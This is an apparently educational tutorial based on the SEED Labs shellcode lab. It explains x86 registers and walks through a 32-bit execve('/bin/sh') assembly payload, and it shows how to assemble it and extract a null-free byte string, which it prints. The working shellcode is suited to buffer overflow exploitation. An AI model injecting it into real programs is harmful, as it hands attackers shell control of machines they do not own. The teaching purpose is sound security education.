# Shellcode
## What is Shellcode?
Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.
One of the most application of Shellcode is **buffer overflows**, which can exploit various security holes in an application.
So far, the shellcode used in exploiting has been just a string of copied and pasted bytes. Shellcode bytes are actually architecture-specific machine instruction, so shellcode is written using the assembly language.
## Writing a shellcode
Let us begin with the following code, with executes a shell program
```C
#include <stddef.h>
void main(){
char* name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
```
Next, we compile the above code into binary, and then save it to the input file. Then we set the targeted return address field to the address of `main()` function, so when the vulnerable program returns, it jumps to the entrance of the above code.
However, this will not work because the code contains zero bytes, which cannot be appeared in shellcode. When we compile the above code into binary, there are some zeros in the binary code:
- The `'\0'` at the end of `"/bin/sh"` string.
- Null byte in `name[1]`
- The zeros value in `execve(name[0], name, NULL);`
So, our task is convert the above `C` code into the binary code which does not contains any zero bytes.
It is suitable to write the above code using assembly language, then convert to binary
Let us briefly talk about the assembly language:
### **Register in x86**
Assembly instructions for the x86 processor have one, two, three, or no operands. The operands to an instruction can be numeriacal values, memory address, or processor registers. The x86 processor has several registers like this:

- EAX, AX, AH and AL are called the "Accumlator" registers and can be used for I/O port access, arithmetic, interrupt calls, etc. We can use these registers to implement system calls
- EBX, BX, BH and BL are called the "Basic" registers and are used as base pointers for memory access. We will use these registers to store pointers in for arguments of system calls. They can also sometimes used to store return value from an interrupt in.
- ECX, CX, CH and CL are "Counter" registers
- EDX, DX, DH and DL are "Data" registers and can be used for I/O port access, arithmetic and some interrupt calls.
Moreover, there are some registers that can be used as operands such as ESI, EDI, EBP, ESP (stack pointer)
### **Instruction**
Below are some instructions in x86 processor:
- `mov a ,b`: copy value of `b` into `a`
- `int x`: send an interrupt signal `x` to the kernel. For example, `int 0x80` tells the kernel to make a system call based on the first four registers EAX, EBX, ECX and EDX.
- `<op> <dst>,<src>`: Conduct the result of the operation between `<dst>` and `<src>`, the result will be stored in `<dst>`. `<op>` can be: `add` (addition), `sub` (subtraction), `and` (bitwise and logic operation), `or` (bitwise or logic operation),`xor` (`bitwise xor logic operation)
- `lea <dst>,<src>`: load the effective address of the source operand into the destination operand
Now, back to the our main topic: shellcode. Let us see the following shellcode for the above C code (this shellcode can be found in `mysh.s` file on [SEEDLAB](https://seedsecuritylabs.org/Labs_20.04/Software/Shellcode/) task):
```
section .text
global _start
_start:
; Store the argument string on stack
xor eax, eax
push eax ; Use 0 to terminate the string
push "//sh" ;
push "/bin"
mov ebx, esp ; Get the string address;
Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] points to the cmd string
mov ecx, esp ; Get the address of argv[]
; For environment variable
xor edx, edx ; No env variable
; Invoke execve()
xor eax, eax ; eax = 0x00000000
mov al, 0x0b ; eax = 0x0000000b
int 0x80
```
We will go over the above shellcode to understand. Back to our C code, when execute, system call number 11, `execve()` is called:
```
SYNOPSIS
#include <unistd.h>
int execve(const char* filename, char* const argv[], char* const envp[])
- filename: must be either a binary executable, or a script starting with a line of the form "#! interpreter [arg]"
- argv: array of arguments string passed to the new program
- envp: array of strings, on the from key=value which are passed as environment to the new program.
Note: Both argv and envp must be terminated by null pointer.
```
Let us dive into the detail of this code:
**Step 1**: Find the address of the `filename` string (in our case, it will be `'/bin/sh'`). Look at the code:
- `xor eax, eax`: Make `eax` be zero. This is an efficient way to obtain zero value without having zero bytes in the code
- `push eax`: push `eax` to the stack (mark the end of the `'/bin/sh'` string).
- Next, we need to push `'/bin/sh'` string to the stack. However, each time we push to the stack, we must push 4 bytes (since this shellcode is 32 bits). But the length of the string is 7, we need to make its length be a multiple of 4. So, we can push `'/bin//sh'` instead of `'/bin/sh'` (in this system call, double slash `//` is similar as `'/'`) . To add `'/bin//sh'`, just simplify push `//sh'`, then push `'/bin'`.
- `mov ebx,esp`: Move `esp` to `ebx`. Since `esp` always points to top of the stack, we saved the address of the string to `ebx` register.
**Step 2**: Find the address of the `argv[]` (in our case, it will be `names` array in the above C code)
- `push eax`: push zero element (the last element `argv[1]` of `argv` array) since `eax` still stores zero value.
- `push ebx`: push the address of the string `/bin//sh'` to the stack, which will be `names[0]`. This way, we constructed the `argv` array.
- `mov ecx,esp`: Move `esp` to `ecx`. We saved the address of the `argv` array (`names` array) to `ecx` register.
**Step 3**: Find the address of the `envp[]`
- The way to construct `envp[]` is similar to the way to construct `argv[]`. Since we don't pass any environment variables, we just xor `edx` to itself and push to the stack.
**Step 4**: Invoke `execve()` system call
- `mov al, 0x0b`: Set the lowest byte of `eax` to `0x0b` since system call `execve()` is 11. This way will avoid null bytes in machine code.
- `int 0x80`: execute the system call
Now we understand the shellcode, let's get the binary code from this:
- **Compiling to object code**: We compile the assembly code (save to `mysh.s` file) above using `nasm` - the Netwide Assembler is a portable 80x86 assembler. The`-f elf32` option indicates that we want to compile the code to 32-bit ELF binary format.
```
[05/12/22]seed@VM:~/.../Shellcode$ nasm -f elf32 mysh.s -o mysh.o
```
- **Linking to generate final binary**: Once we get the object code `mysh.o`, if we want to generate the executable binary, we can run the linker program `ld`. The `-m elf_i386` option means generating the 32-bit ELF binary.
```
[05/13/22]seed@VM:~/.../Shellcode$ ld -m elf_i386 mysh.o -o mysh
[05/13/22]seed@VM:~/.../Shellcode$ mysh
sh-5.0$
```
Now we got the shell.
- **Getting the machine code**: We only need the machine code of the shellcode. We can use the `objdump` to displays information from object files
<pre>
sh-5.0$ objdump -Mintel --disassemble mysh.o
mysh.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: <b>31</b> <b>c0</b> xor eax,eax
2: <b>50</b> push eax
3: <b>68</b> <b>2f</b> <b>2f</b> <b>73</b> <b>68</b> push 0x68732f2f
8: <b>68</b> <b>2f</b> <b>62</b> <b>69</b> <b>6e</b> push 0x6e69622f
d: <b>89</b> <b>e3</b> mov ebx,esp
f: <b>50</b> push eax
10: <b>53</b> push ebx
11: <b>89</b> <b>e1</b> mov ecx,esp
13: <b>31</b> <b>d2</b> xor edx,edx
15: <b>31</b> <b>c0</b> xor eax,eax
17: <b>b0</b> <b>0b</b> mov al,0xb
19: <b>cd</b> <b>80</b> int 0x80
</pre>
In the above printout, the highlighted numbers are machine code. We can extract them by using the `xxd` command to print out the content of the binary file:
<pre>
sh-5.0$ xxd -p -c 20 mysh.o
7f454c460101010000000000000000000100030001000000000000000000000040000000000000003400000000002800050002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000100100001b00000000000000000000001000000000000000070000000300000000000000000000003001000021000000000000000000000001000000000000001100000002000000000000000000000060010000400000000400000003000000040000001000000019000000030000000000000000000000a00100000f000000000000000000000001000000000000000000000000000000<b>31c050682f2f7368682f62696e89e3505389e131d231c0b00bcd80</b>0000000000002e74657874002e7368737472746162002e73796d746162002e73747274616200000000000000000000000000000000000000000000000000000000000000000100000000000000000000000400f1ff0000000000000000000000000300010008000000000000000000000010000100006d7973682e73005f73746172740000
</pre>
The extracted shellcode now is:
```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80"
```
## Countermeasure
Often, hackers try to reverse engineer programs to find their vulnerable spots. We can start by making sure that all the vulnerabilities of the software you use are alleviated. In addition, we can also address **buffer overflows** to make sure that your organization is safe from shellcode injection